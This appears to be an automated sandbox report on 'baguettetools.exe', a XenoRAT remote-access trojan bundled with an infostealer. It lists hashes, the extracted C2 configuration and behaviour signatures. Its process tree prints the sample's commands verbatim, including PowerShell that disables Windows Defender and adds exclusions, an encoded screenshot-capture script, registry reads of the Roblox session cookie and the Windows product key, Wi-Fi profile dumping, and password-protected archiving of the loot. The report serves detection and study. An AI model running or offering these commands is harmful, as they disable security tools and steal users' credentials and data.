Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2024 03:24

General

  • Target

    baguettetools.exe

  • Size

    7.5MB

  • MD5

    6c93db007ac855a52224591dbb98b4e1

  • SHA1

    b720c1f4253a4188f0fd221b645bc43463500116

  • SHA256

    63efbee5d3321fddd113d6ff67aae7dbad497a14c928fb40a0c87d8dbebb9f00

  • SHA512

    46a4cdc813b08ba0609622de44b075e5c3e9681308e883b357eaa23d8e8343ab906191b28df380c3ba8321cf45dac459867bd4ad9e9e6afba3d62057deac4415

  • SSDEEP

    196608:AsgVVEfwfI9jUC2gYBYv3vbW2+iITx1U6nn:CVVE0IH2gYBgDWJTnzn

Malware Config

Extracted

Family

xenorat

C2

192.168.1.36

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    5000

  • install_path

    nothingset

  • port

    4444

  • startup_name

    nothingset

Signatures

  • Detect XenoRat Payload 2 IoCs
  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 55 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\baguettetools.exe
    "C:\Users\Admin\AppData\Local\Temp\baguettetools.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Users\Admin\AppData\Local\Temp\baguettetools.exe
      "C:\Users\Admin\AppData\Local\Temp\baguettetools.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:3764
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\baguettetools.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3500
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\baguettetools.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2000
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1252
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2308
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:2600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2408
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4860
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4416
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1172
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4956
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4740
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:1244
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3296
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2532
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3348
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:636
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:3712
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3680
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:3468
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:464
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2448
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c2tdhx4c\c2tdhx4c.cmdline"
              5⤵
                PID:2932
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES881C.tmp" "c:\Users\Admin\AppData\Local\Temp\c2tdhx4c\CSCDD15B25B891F4536AB5EC26FA43B555E.TMP"
                  6⤵
                    PID:4836
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2200
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:4764
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4016
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:768
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:1436
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4028
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:1596
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:3600
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:4808
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:3144
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:4584
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4828
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:1996
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4952
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "getmac"
                                  3⤵
                                    PID:4948
                                    • C:\Windows\system32\getmac.exe
                                      getmac
                                      4⤵
                                        PID:4392
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\p40Zv.zip" *"
                                      3⤵
                                        PID:3912
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\p40Zv.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4340
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:1876
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1912
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                          3⤵
                                            PID:400
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic computersystem get totalphysicalmemory
                                              4⤵
                                                PID:1940
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:2804
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                    PID:4456
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                  3⤵
                                                    PID:4748
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1576
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                    3⤵
                                                      PID:1152
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        PID:3208
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:1584
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:3348
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                                                    1⤵
                                                    • Enumerates system info in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:4392
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
